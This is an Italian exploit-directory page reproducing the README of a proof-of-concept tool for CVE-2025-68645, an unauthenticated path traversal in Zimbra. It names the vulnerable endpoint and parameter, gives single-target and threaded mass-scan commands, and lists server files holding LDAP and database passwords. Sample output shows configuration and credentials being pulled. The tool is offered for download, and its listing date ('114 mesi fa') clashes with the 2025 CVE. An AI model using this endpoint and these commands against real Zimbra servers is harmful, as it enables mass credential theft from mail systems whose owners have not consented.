Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/harisaidhin/poc_cve-2025-68645
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Vulnerabilità di lettura file non autenticata in Zimbra Collaboration Suite

Vedi Repository
114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68645 - Vulnerabilità di Path Traversal in Zimbra

Security CVE Python License Status

📋 Panoramica

CVE-2025-68645 è una vulnerabilità di path traversal in Zimbra Collaboration Suite che consente ad attacker non autenticati di leggere file arbitrari dal filesystem del server.

Endpoint Vulnerabile

/h/printconversations?javax.servlet.include.servlet_path=

🎯 Impatto

ImpattoGravità
Lettura file non autenticata🔴 Alta
Divulgazione della configurazione🔴 Alta
Perdita di credenziali🔴 Alta
Mappatura della rete interna🟠 Media

📁 File Leggibili

🚀 Utilizzo

Scansione di un Singolo Target

python CVE-2025-68645.py.py -t https://target.zimbra.com

Scansione di Massa

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

Opzioni Avanzate

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 Argomenti della Riga di Comando

Argomento Descrizione Predefinito -t, --target URL di un singolo target Nessuno -l, --list File contenente un elenco di target Nessuno -o, --output Nome del file di output results.json --threads Numero di thread concorrenti 10 --timeout Timeout della richiesta in secondi 15 -v, --verbose Abilita output dettagliato False --no-verify Disabilita la verifica SSL False --read-all Leggi tutti i percorsi sensibili False

📸 Esempio di Output

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

Scarica lo strumento
PathInformazioni Esposte
/WEB-INF/web.xmlMapping dei servlet, vincoli di sicurezza
/WEB-INF/zcs.web.xmlConfigurazione specifica di Zimbra
/opt/zimbra/conf/localconfig.xmlCredenziali LDAP, password del database
/opt/zimbra/conf/ldap-config.xmlConfigurazione del server LDAP
/opt/zimbra/conf/attrs/zimbra-attrs.xmlAttributi di sistema
/WEB-INF/classes/logging.propertiesConfigurazione del logging